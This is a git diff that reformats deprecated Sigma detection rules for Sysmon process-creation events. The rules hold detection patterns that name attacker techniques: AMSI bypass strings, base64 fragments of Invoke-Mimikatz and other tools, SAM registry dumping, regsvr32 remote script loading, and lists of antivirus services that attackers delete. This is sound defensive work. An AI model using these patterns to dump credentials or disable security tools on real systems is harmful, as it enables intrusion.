Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE condition: process_creation and (all of selection_1_* or all of selection_2_*) falsepositives: - Legitimate use of odbcconf.exe by legitimate user diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml index 986b40e8b..93c3a472f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -29,14 +23,15 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - Image|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_other: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec @@ -46,7 +41,7 @@ detection: - \winword.exe - \excel.exe - \powerpnt.exe - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml index 77975fc7c..512f5d64c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml @@ -1,17 +1,11 @@ title: Excel Proxy Executing Regsvr32 With Payload Alternate id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 status: deprecated -description: 'Excel called wmic to finally proxy execute regsvr32 with the payload. - +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). - - But we have command-line in the event which allow us to "restore" this suspicious - parent-child chain and detect it. - - Monitor process creation with "wmic process call create" and LOLBins in command-line - with parent Office application processes. - - ' + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -29,26 +23,27 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - msiexec - mshta - verclsid selection2: - - Image|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - Image|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection3: ParentImage|endswith: - \winword.exe - \excel.exe - \powerpnt.exe selection4: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call diff --git a/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml index 557619043..512e6d8a9 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml @@ -1,8 +1,7 @@ title: Office Applications Spawning Wmi Cli Alternate id: 04f5363a-6bca-42ff-be70-0d28bf629ead status: deprecated -description: Initial execution of malicious document calls wmic to execute the file - with regsvr32 +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -20,12 +19,13 @@ logsource: product: windows category: process_creation detection: + #useful_information: Add more office applications to the rule logic of choice process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - - Image|endswith: \wbem\WMIC.exe - - CommandLine|contains: 'wmic ' + - Image|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection2: ParentImage|endswith: - \winword.exe diff --git a/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml b/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml index b41625abc..c4ed6b6c0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml @@ -1,8 +1,7 @@ title: Possible Applocker Bypass id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 status: deprecated -description: Detects execution of executables that can be used to bypass Applocker - whitelisting +description: Detects execution of executables that can be used to bypass Applocker whitelisting references: - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ @@ -16,7 +15,7 @@ tags: - attack.t1218.009 - attack.t1127.001 - attack.t1218.005 - - attack.t1218 + - attack.t1218 # no way to map 1:1, so the technique level is required - sysmon logsource: category: process_creation @@ -26,18 +25,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - \msdt.exe - \installutil.exe - \regsvcs.exe - \regasm.exe + #- '\regsvr32.exe' # too many FPs, very noisy - \msbuild.exe - \ieexec.exe + #- '\mshta.exe' + #- '\csc.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment - - Using installutil to add features for .NET applications (primarily would occur - in developer environments) + - False positives depend on scripts and administrative tools used in the monitored environment + - Using installutil to add features for .NET applications (primarily would occur in developer environments) level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml index 3679f356b..01d07cc65 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml @@ -1,8 +1,7 @@ title: PowerShell AMSI Bypass Pattern id: 4f927692-68b5-4267-871b-073c45f4f6fe status: deprecated -description: Detects attempts to disable AMSI in the command line. It is possible - to bypass AMSI by disabling it before loading the main payload. +description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. author: '@Kostastsale' references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -25,7 +24,7 @@ detection: - \powershell.exe - \pwsh.exe - \powershell_ise.exe - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml index 751122cc3..44dbf63e7 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -1,11 +1,10 @@ title: Malicious Base64 Encoded Powershell Invoke Cmdlets id: fd6e2919-3936-40c9-99db-0aa922c356f7 related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar status: deprecated -description: Detects base64 encoded powershell cmdlet invocation of known suspicious - cmdlets +description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ author: pH-T (Nextron Systems) @@ -25,13 +24,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # Invoke-BloodHound - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA + # Invoke-Mimikatz - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg + # Invoke-WMIExec - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml index fa3608c2e..4a5a2f6d0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -21,7 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Win32_Shadowcopy | ForEach-Object + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml index 7e429c504..3478733a4 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - OiCAAAAYInlM - OiJAAAAYInlM condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml index df6f31093..0b0259169 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml @@ -24,7 +24,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: Start-BitsTransfer + CommandLine|contains: Start-BitsTransfer condition: process_creation and selection fields: - ComputerName diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml index 3471567b0..a327858ab 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml @@ -1,13 +1,9 @@ title: Stop Or Remove Antivirus Service id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b status: deprecated -description: 'Detects usage of ''Stop-Service'' or ''Remove-Service'' powershell cmdlet - to disable AV services. - - Adversaries may disable security tools to avoid possible detection of their tools - and activities by stopping antivirus service - - ' +description: | + Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. + Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ @@ -26,11 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_action: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_product: - CommandLine|contains: + CommandLine|contains: + # Feel free to add more service name - ' McAfeeDLPAgentService' - ' Trend Micro Deep Security Manager' - ' TMBMServer' diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml index 4bfea34ce..1af3a4c7e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml @@ -1,12 +1,10 @@ title: Potential Xor Encoded PowerShell Command id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 related: - - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f - type: similar + - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f + type: similar status: deprecated -description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. - This pattern is often found in encoded powershell code and commands as a way to - avoid detection +description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -26,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.exe + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ForEach - Xor condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml b/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml index 88b57caf8..b2fda5fa9 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml @@ -1,12 +1,10 @@ title: Registry Dump of SAM Creds and Secrets id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e related: - - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 - type: similar + - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 + type: similar status: deprecated -description: Adversaries may attempt to extract credential material from the Security - Account Manager (SAM) database either through Windows Registry where the SAM database - is stored +description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets author: frack113 @@ -24,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - CommandLine|contains: ' save ' + CommandLine|contains: ' save ' selection_key: - CommandLine|contains: + CommandLine|contains: - HKLM\sam - HKLM\system - HKLM\security diff --git a/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml b/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml index 68ba74dd9..3c892f254 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1: Image|endswith: \regsvr32.exe - CommandLine|contains: \Temp\ + CommandLine|contains: \Temp\ selection2: Image|endswith: \regsvr32.exe ParentImage|endswith: @@ -35,16 +35,16 @@ detection: ParentImage|endswith: \cmd.exe selection4a: Image|endswith: \regsvr32.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - http - CommandLine|endswith: scrobj.dll + CommandLine|endswith: scrobj.dll selection4b: Image|endswith: \regsvr32.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - ftp - CommandLine|endswith: scrobj.dll + CommandLine|endswith: scrobj.dll selection5: Image|endswith: - \cscript.exe @@ -52,18 +52,18 @@ detection: ParentImage|endswith: \regsvr32.exe selection6: Image|endswith: \EXCEL.EXE - CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' selection7: ParentImage|endswith: \mshta.exe Image|endswith: \regsvr32.exe selection8: Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - \AppData\Local - C:\Users\Public - selection9: + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 Image|endswith: \regsvr32.exe - CommandLine|endswith: + CommandLine|endswith: - .jpg - .jpeg - .png @@ -73,14 +73,14 @@ detection: - .temp - .txt filter1: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Microsoft\Teams - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll filter2: ParentImage: C:\Program Files\Box\Box\FS\streem.exe - CommandLine|contains: \Program Files\Box\Box\Temp\ + CommandLine|contains: \Program Files\Box\Box\Temp\ filter_legitimate: - CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll condition: process_creation and (1 of selection* and not 1 of filter*) fields: - CommandLine diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml index b90662aee..eadbdf89f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,7 @@ title: Renamed PaExec Execution id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b status: deprecated -description: Detects execution of renamed paexec via imphash and executable product - string +description: Detects execution of renamed paexec via imphash and executable product string references: - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf @@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: Image|contains: paexec condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml index 1481304f7..2f21f4598 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml @@ -1,8 +1,7 @@ title: Renamed PowerShell id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 status: deprecated -description: Detects the execution of a renamed PowerShell often used by attackers - or malware +description: Detects the execution of a renamed PowerShell often used by attackers or malware references: - https://twitter.com/christophetd/status/1164506034720952320 author: Florian Roth (Nextron Systems), frack113 diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml index 886979f62..d333de9d7 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml @@ -1,8 +1,7 @@ title: Renamed PsExec id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 status: deprecated -description: Detects the execution of a renamed PsExec often used by attackers or - malware +description: Detects the execution of a renamed PsExec often used by attackers or malware references: - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml index 3d019b7a8..7fcb10a94 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml @@ -1,8 +1,7 @@ title: Renamed Rundll32.exe Execution id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 status: deprecated -description: Detects the execution of rundll32.exe that has been renamed to a different - name to avoid detection +description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection references: - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml b/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml index b7dd7eb85..ac8d105b5 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml @@ -1,11 +1,10 @@ title: Root Certificate Installed id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived status: deprecated -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -23,18 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - Image|endswith: \certutil.exe - CommandLine|contains|all: + Image|endswith: \certutil.exe # Example: certutil -addstore -f -user ROOT CertificateFileName.der + CommandLine|contains|all: - -addstore - root selection2: - Image|endswith: \CertMgr.exe - CommandLine|contains|all: + Image|endswith: \CertMgr.exe # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all + CommandLine|contains|all: - /add - root condition: process_creation and (selection1 or selection2) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml b/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml index 9827ff64b..b19bf5212 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml @@ -1,8 +1,7 @@ title: Run from a Zip File id: 1a70042a-6622-4a2b-8958-267625349abf status: deprecated -description: Payloads may be compressed, archived, or encrypted in order to avoid - detection +description: Payloads may be compressed, archived, or encrypted in order to avoid detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file author: frack113 diff --git a/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml b/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml index 938ead1c9..9099706ed 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml @@ -1,8 +1,7 @@ title: Suspicious Execution of Sc to Delete AV Services id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b status: deprecated -description: Detects when attackers use "sc.exe" to delete AV services from the system - in order to avoid detection +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,18 +20,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_av_process: - CommandLine|contains: + CommandLine|contains: + # Delete Service 'AVG' - AvgAdminServer - AVG Antivirus - MBEndpointAgent + # Delete Service 'Malwarebytes' - MBAMService - MBCloudEA - avgAdminClient + # Delete Service 'Sophos' - SAVService - SAVAdminService - Sophos AutoUpdate Service @@ -55,11 +57,15 @@ detection: - Sophos Endpoint Defense Service - SophosFIM - swi_filter + # Delete Service 'FireBird' - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance + # Delete Service 'Webroot' - WRSVC + # Delete Service 'ESET' - ekrn - ekrnEpsw + # Delete Service 'Kaspersky' - klim6 - AVP18.0.0 - KLIF @@ -72,6 +78,7 @@ detection: - klhk - KSDE1.0.0 - kltap + # Delete Service 'Quick Heal' - ScSecSvc - Core Mail Protection - Core Scanning Server @@ -80,11 +87,13 @@ detection: - RepairService - Core Browsing Protection - Quick Update Service + # Delete Service 'McAfee' - McAfeeFramework - macmnsvc - masvc - mfemms - mfevtp + # Delete Service 'Trend Micro' - TmFilter - TMLWCSService - tmusa @@ -99,6 +108,7 @@ detection: - ofcservice - TmPfw - PccNTUpd + # Delete Service 'Panda' - PandaAetherAgent - PSUAService - NanoServiceMain @@ -109,7 +119,6 @@ detection: - EPUpdateService condition: process_creation and (all of selection*) falsepositives: - - Legitimate software deleting using the same method of deletion (Add it to a - filter if you find cases as such) + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml b/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml index b1c1f8e02..253b14075 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml @@ -21,11 +21,11 @@ detection: schtasks: Image|endswith: \schtasks.exe option: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create ' - \AppData\Local\Temp filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml condition: process_creation and (schtasks and option and not 1 of filter_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml b/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml index 80b585abb..1a0cec354 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml @@ -17,30 +17,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc_net_img: - - OriginalFileName: - - sc.exe - - net.exe - - net1.exe - - Image|endswith: - - \sc.exe - - \net.exe - - \net1.exe + - OriginalFileName: + - sc.exe + - net.exe + - net1.exe + - Image|endswith: + - \sc.exe + - \net.exe + - \net1.exe selection_sc_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: 'Stop-Service ' + CommandLine|contains: 'Stop-Service ' filter: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - User|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + User|contains: # covers many language settings - AUTHORI - AUTORI - condition: process_creation and ((all of selection_sc_net* and not filter) or - selection_pwsh) 